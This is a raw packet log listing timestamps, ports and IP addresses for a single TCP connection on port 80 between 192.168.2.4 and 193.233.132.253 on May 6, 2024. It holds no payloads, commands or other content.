May 6, 2024 07:53:14.416527033 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416529894 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416543007 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416546106 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416553974 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416573048 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416589022 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416599035 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416613102 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416624069 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416634083 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416635990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416651964 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416666985 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416676044 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416680098 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416691065 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416706085 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416707993 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416719913 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416727066 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416734934 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416744947 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416747093 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416753054 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416760921 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416771889 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416774035 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416785002 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416788101 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416796923 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416800976 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416811943 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416819096 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416831017 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416831970 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416841984 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416881084 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416989088 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417000055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417012930 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417018890 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417026043 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417041063 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417042017 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417049885 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417054892 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417067051 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417072058 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417078972 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417083025 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417092085 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417104006 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417109013 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417119026 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417120934 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417131901 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417135954 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417145014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417149067 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417159081 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417161942 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417175055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417181969 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417186975 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417188883 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417198896 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417206049 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417212963 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417218924 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417226076 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417237997 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417241096 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417251110 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417259932 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417263985 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417273998 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417277098 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417289019 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417290926 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417304039 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417315960 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417325020 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417330027 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417340994 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417341948 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417355061 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417356014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417367935 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417376995 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417381048 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417387009 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417393923 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417404890 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417407990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417422056 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417433023 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417443991 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417449951 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417455912 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417455912 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417455912 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417458057 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417465925 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417470932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417484045 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417489052 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417495966 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417506933 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417509079 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417522907 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417526007 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417531967 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417535067 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417548895 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417550087 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417562008 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417565107 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417578936 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417581081 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417591095 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417594910 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417603016 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417609930 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417620897 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417623043 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417633057 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417637110 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417650938 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417653084 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417666912 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417673111 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417679071 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417689085 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417691946 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417701960 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417705059 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417717934 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417722940 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417730093 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417735100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417742968 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417752981 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417756081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417771101 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417784929 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417798042 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417809963 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417810917 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417824030 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417839050 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417845011 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417850971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417869091 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417941093 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417956114 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417967081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417978048 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.417984009 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417989969 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.417993069 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.418005943 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.418013096 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.418018103 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.418020010 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.418031931 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.418037891 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.418044090 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.418055058 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.418057919 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.418087959 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.424135923 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.424273968 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679214954 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679233074 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679244041 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679259062 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679270983 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679282904 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679296017 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679305077 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679306984 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679322004 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679333925 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679336071 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679346085 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679349899 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679358959 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679371119 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679372072 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679383993 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679399014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679424047 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679428101 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679436922 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679449081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679461002 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679469109 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679476023 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679488897 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679491997 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679502964 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679514885 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679514885 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679528952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679538012 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679541111 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679553032 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679560900 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679574966 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679574966 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679584980 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679600954 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679604053 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679610968 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679615974 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679641008 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679641962 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679656982 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679665089 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679706097 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679732084 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679764032 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679804087 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679874897 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679888964 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679899931 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679912090 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679923058 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679924011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679933071 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679936886 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679950953 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679960012 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679968119 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.679980993 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.679991007 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680000067 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680003881 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680016041 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680033922 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680063009 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680063963 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680082083 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680097103 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680113077 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680118084 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680124998 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680131912 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680138111 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680150032 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680156946 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680162907 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680174112 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680181026 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680187941 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680201054 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680202007 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680212975 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680226088 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680233955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680241108 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680252075 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680253029 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680265903 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680267096 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680279970 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680290937 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680291891 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680305004 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680316925 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680318117 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680330038 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680342913 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680356979 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680358887 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680387974 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680392027 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680404902 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680407047 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680418015 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680421114 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680442095 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680445910 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680455923 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680465937 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680468082 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680484056 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680490971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680509090 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680515051 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680522919 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680560112 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680577040 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680588961 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680603027 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680613995 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680619001 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680630922 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680639029 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680644035 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680658102 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680659056 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680680037 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680691004 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680713892 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680771112 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680783033 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680794001 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680811882 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680815935 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680830956 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680835962 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680844069 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680855036 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680857897 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680866957 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680874109 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680877924 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680907965 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680929899 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680937052 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680948973 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680958033 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680972099 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680984974 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.680984974 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.680998087 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681010008 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.681029081 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.681051970 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.681071997 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681083918 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681093931 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681106091 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681107044 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.681118011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681119919 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.681132078 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681133986 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.681144953 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681159973 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681163073 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.681174040 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681183100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.681186914 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681197882 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.681205034 CEST	49743	80	192.168.2.4	193.233.132.253
